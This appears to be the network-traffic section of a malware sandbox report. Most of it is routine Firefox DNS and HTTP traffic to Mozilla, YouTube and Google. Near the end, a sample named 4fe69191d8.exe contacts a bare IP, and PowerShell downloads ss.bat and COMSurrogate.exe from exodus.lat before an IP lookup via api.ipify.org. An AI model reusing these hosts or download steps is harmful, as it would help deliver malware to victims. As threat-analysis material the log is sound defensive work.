                                  youtube.com
                                  IN A
                                  216.58.213.14
                                • flag-us
                                  GET
                                  https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
                                  firefox.exe
                                  Remote address:
                                  34.149.97.1:443
                                  Request
                                  GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
                                  host: firefox-api-proxy.cdn.mozilla.net
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  consumer_key: 94110-6d5ff7a89d72c869766af0e0
                                  if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN AAAA
                                  Response
                                  youtube.com
                                  IN AAAA
                                  2a00:1450:4009:816::200e
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN AAAA
                                  Response
                                  youtube.com
                                  IN AAAA
                                  2a00:1450:4009:816::200e
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  172.210.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.210.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  172.210.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.210.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  34.160.144.191
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  34.160.144.191
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:74e4::
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN A
                                  Response
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.32.237.164
                                  shavar.prod.mozaws.net
                                  IN A
                                  44.226.106.83
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.33.23.190
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:92a9::
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:92a9::
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                  Response
                                  www.youtube.com
                                  IN CNAME
                                  youtube-ui.l.google.com
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                  Response
                                  www.youtube.com
                                  IN CNAME
                                  youtube-ui.l.google.com
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-gb
                                  GET
                                  https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                                  host: www.youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-gb
                                  GET
                                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                                  host: consent.youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  cookie: SOCS=CAAaBgiA_ci6Bg
                                  cookie: YSC=oSwVSZ4ICCI
                                  cookie: __Secure-YEC=CgtJa3lEMUFKQ3FKOCjHvcm6BjIKCgJHQhIEGgAgRg%3D%3D
                                  cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRg%3D%3D
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                  Response
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                  Response
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  Response
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:815::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:823::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:821::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  Response
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:821::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:823::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:815::200e
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  14.213.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s25-in-f141e100net
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  ber01s14-in-f14�H
                                • flag-us
                                  DNS
                                  firefox-settings-attachments.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN A
                                  Response
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN CNAME
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  164.237.32.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  164.237.32.52.in-addr.arpa
                                  IN PTR
                                  Response
                                  164.237.32.52.in-addr.arpa
                                  IN PTR
                                  ec2-52-32-237-164 us-west-2compute amazonawscom
                                • flag-us
                                  DNS
                                  206.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f141e100net
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN AAAA
                                  Response
                                  consent.youtube.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                • flag-us
                                  GET
                                  https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                                  firefox.exe
                                  Remote address:
                                  34.117.121.53:443
                                  Request
                                  GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
                                  host: firefox-settings-attachments.cdn.mozilla.net
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  te: trailers
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  14.200.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  lhr48s29-in-f141e100net
                                • flag-us
                                  DNS
                                  14.200.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  lhr48s29-in-f141e100net
                                • flag-us
                                  DNS
                                  227.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s34-in-f31e100net
                                • flag-us
                                  DNS
                                  227.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s34-in-f31e100net
                                • flag-us
                                  DNS
                                  74.204.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f741e100net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr48s49-in-f10�H
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f10�H
                                • flag-us
                                  DNS
                                  74.204.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f741e100net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f10�H
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr48s49-in-f10�H
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-gb
                                  GET
                                  https://www.google.com/favicon.ico
                                  firefox.exe
                                  Remote address:
                                  142.250.187.196:443
                                  Request
                                  GET /favicon.ico HTTP/2.0
                                  host: www.google.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: image/avif,image/webp,*/*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  referer: https://consent.youtube.com/
                                  sec-fetch-dest: image
                                  sec-fetch-mode: no-cors
                                  sec-fetch-site: cross-site
                                  te: trailers
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN AAAA
                                  Response
                                  www.google.com
                                  IN AAAA
                                  2a00:1450:4009:81f::2004
                                • flag-us
                                  DNS
                                  195.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f31e100net
                                • flag-us
                                  DNS
                                  195.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f31e100net
                                • flag-us
                                  DNS
                                  196.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f41e100net
                                • flag-us
                                  DNS
                                  196.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f41e100net
                                • flag-us
                                  DNS
                                  211.38.74.45.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  211.38.74.45.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-nl
                                  GET
                                  http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                                  4fe69191d8.exe
                                  Remote address:
                                  92.63.197.221:80
                                  Request
                                  GET /add?substr=mixtwo&s=three&sub= HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 92.63.197.221
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                • flag-us
                                  DNS
                                  221.197.63.92.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  221.197.63.92.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  exodus.lat
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  exodus.lat
                                  IN A
                                  Response
                                  exodus.lat
                                  IN A
                                  203.161.45.11
                                • flag-us
                                  DNS
                                  exodus.lat
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  exodus.lat
                                  IN A
                                  Response
                                  exodus.lat
                                  IN A
                                  203.161.45.11
                                • flag-nl
                                  GET
                                  https://exodus.lat/ss.bat
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /ss.bat HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Thu, 05 Dec 2024 00:35:03 GMT
                                  accept-ranges: bytes
                                  content-length: 6492
                                  date: Fri, 06 Dec 2024 02:17:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://exodus.lat/COMSurrogate.exe
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /COMSurrogate.exe HTTP/1.1
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Fri, 29 Nov 2024 20:45:59 GMT
                                  accept-ranges: bytes
                                  content-length: 167936
                                  date: Fri, 06 Dec 2024 02:17:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-us
                                  DNS
                                  11.45.161.203.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  Response
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  server700-1shared spaceshiphost
                                • flag-us
                                  DNS
                                  11.45.161.203.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  Response
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  server700-1shared spaceshiphost
                                • flag-nl
                                  GET
                                  https://exodus.lat/COMSurrogate.exe
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /COMSurrogate.exe HTTP/1.1
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Fri, 29 Nov 2024 20:45:59 GMT
                                  accept-ranges: bytes
                                  content-length: 167936
                                  date: Fri, 06 Dec 2024 02:17:59 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-us
                                  DNS
                                  api.ipify.org
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  api.ipify.org
                                  IN A
                                  Response
                                  api.ipify.org
                                  IN A
                                  172.67.74.152
                                  api.ipify.org
                                  IN A
                                  104.26.13.205
                                  api.ipify.org
                                  IN A
                                  104.26.12.205
                                • flag-us
                                  GET
                                  https://api.ipify.org/
                                  curl.exe
                                  Remote address:
                                  172.67.74.152:443
                                  Request
                                  GET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:18:00 GMT
                                  Content-Type: text/plain
                                  Content-Length: 14
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8ed8c865cddc9496-LHR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48454&min_rtt=47181&rtt_var=15569&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3278&recv_bytes=383&delivery_rate=79606&cwnd=253&unsent_bytes=0&cid=739fd754cb65078b&ts=456&x=0"
                                • flag-us
                                  DNS
                                  c.pki.goog
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  c.pki.goog
                                  IN A
                                  Response
                                  c.pki.goog
                                  IN CNAME
                                  pki-goog.l.google.com
                                  pki-goog.l.google.com
                                  IN A
                                  142.250.200.35
                                • flag-gb
                                  GET
                                  http://c.pki.goog/r/gsr1.crl
                                  Remote address:
                                  142.250.200.35:80
                                  Request
                                  GET /r/gsr1.crl HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: c.pki.goog
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                  Content-Length: 1739
                                  X-Content-Type-Options: nosniff
                                  Server: sffe
                                  X-XSS-Protection: 0
                                  Date: Fri, 06 Dec 2024 01:39:53 GMT
                                  Expires: Fri, 06 Dec 2024 02:29:53 GMT
                                  Cache-Control: public, max-age=3000
